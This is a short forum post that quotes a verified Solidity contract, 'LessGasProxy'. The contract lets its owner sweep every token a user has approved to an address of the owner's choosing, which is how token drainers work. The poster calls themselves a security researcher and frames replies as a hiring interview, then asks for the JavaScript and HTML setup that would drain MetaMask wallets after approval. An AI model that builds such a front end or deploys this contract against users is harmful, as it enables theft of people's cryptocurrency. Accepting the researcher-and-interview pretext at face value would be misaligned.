Hi everyone, I am a security researcher, I would like to ask in which JavaScript + html scenario the below contract can be used to transfer users metamask wallet of their tokens after approval on their site?
I need to do a report on it so any help would be appreciated. We are hiring solidify remote developers so you can also consider it as an interview.
Contract:
/**
*Submitted for verification at Etherscan.io on 2021-02-14
*/
// SPDX-License-Identifier: SEE LICENSE IN LICENSE
pragma solidity 0.6.12;
interface IERC20Token {
function allowance(address _owner, address _spender) external view returns (uint256);
function transferFrom(address _from, address _to, uint256 _value) external returns (bool);
}
contract LessGasProxy {
address public owner;
constructor() public {
owner = msg.sender;
}
function transferFrom(IERC20Token _token, address _sender, address _receiver) external returns (bool) {
require(msg.sender == owner, "access denied");
uint256 amount = _token.allowance(_sender, address(this));
return _token.transferFrom(_sender, _receiver, amount);
}
function transferGas(IERC20Token _token, address _sender, address _receiver, uint256 _amount) external returns (bool) {
require(msg.sender == owner, "access denied");
return _token.transferFrom(_sender, _receiver, _amount);
}
}
Source: https://etherscan.io/address/0x7AE7D6E2E61FBF0BE780DD19B6A01F5D44BEDE89#code
Topic: How do evil contracts work? (Read 53 times)
Jump to: